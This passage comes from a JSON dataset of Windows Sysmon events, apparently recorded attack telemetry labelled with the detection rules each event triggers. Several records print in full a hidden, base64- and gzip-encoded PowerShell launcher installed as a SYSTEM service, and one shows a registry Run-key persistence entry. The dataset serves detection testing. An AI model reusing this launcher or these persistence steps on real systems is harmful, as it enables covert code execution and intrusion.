08:07:52.956"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":8119,"Execution_attributes":{"ProcessID":2020,"ThreadID":2088},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-06-20T08:07:52.956810Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k localService -p -s RemoteRegistry","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-3407-5FCB-0000-0020E5030000","LogonId":"0x3e5","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":612,"ProcessGuid":"747F3D96-BB00-5FCA-0000-001033CD7600","ProcessId":8536,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\LOCAL SERVICE","UtcTime":"2020-12-04 22:41:04.465"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":549016,"Execution_attributes":{"ProcessID":3560,"ThreadID":4600},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-12-04T22:41:04.470207Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Windows\\System32\\Rundll32.exe smssvc.dll,Start","EventType":"SetValue","Image":"C:\\Windows\\system32\\svchost.exe","ProcessGuid":"747F3D96-BB00-5FCA-0000-001033CD7600","ProcessId":8536,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SUpdate","UtcTime":"2020-12-04 22:41:04.544"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":549018,"Execution_attributes":{"ProcessID":3560,"ThreadID":4600},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-12-04T22:41:04.545145Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000003)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-2586-5CC9-0000-0010DC530000","ProcessId":460,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\hello\\Start","UtcTime":"2019-04-30 20:26:51.934"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":9805,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:26:51.949839Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware","PowerShell as a Service in Registry"],"event":{"Event":{"EventData":{"Details":"%%COMSPEC%% /b /c start /b /min powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\"","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-2586-5CC9-0000-0010DC530000","ProcessId":460,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\hello\\ImagePath","UtcTime":"2019-04-30 20:26:51.934"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":9806,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:26:51.981089Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Mimikatz Command Line","FromBase64String Command Line","Curl Start Combination","Encoded FromBase64String"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-2586-5CC9-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"C:\\Windows\\system32\\services.exe","ParentImage":"C:\\Windows\\System32\\services.exe","ParentProcessGuid":"365ABB72-2586-5CC9-0000-0010DC530000","ParentProcessId":460,"ProcessGuid":"365ABB72-AF8B-5CC8-0000-00101C1A1900","ProcessId":3348,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-04-30 20:26:51.949"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9807,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:26:52.090464Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Mimikatz Command Line","FromBase64String Command Line","Encoded FromBase64String"],"event":{"Event":{"EventData":{"CommandLine":"powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows PowerShell","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-2586-5CC9-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-AF8B-5CC8-0000-00101C1A1900","ParentProcessId":3348,"ProcessGuid":"365ABB72-AF8B-5CC8-0000-0010AC1B1900","ProcessId":3872,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-04-30 20:26:51.965"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9808,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:26:52.106089Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","FromBase64String Command Line","Encoded FromBase64String"],"event":{"Event":{"EventData":{"CommandLine":"\"powershell.exe\" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA=='))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows PowerShell","FileVersion":"6.1.7600.16385 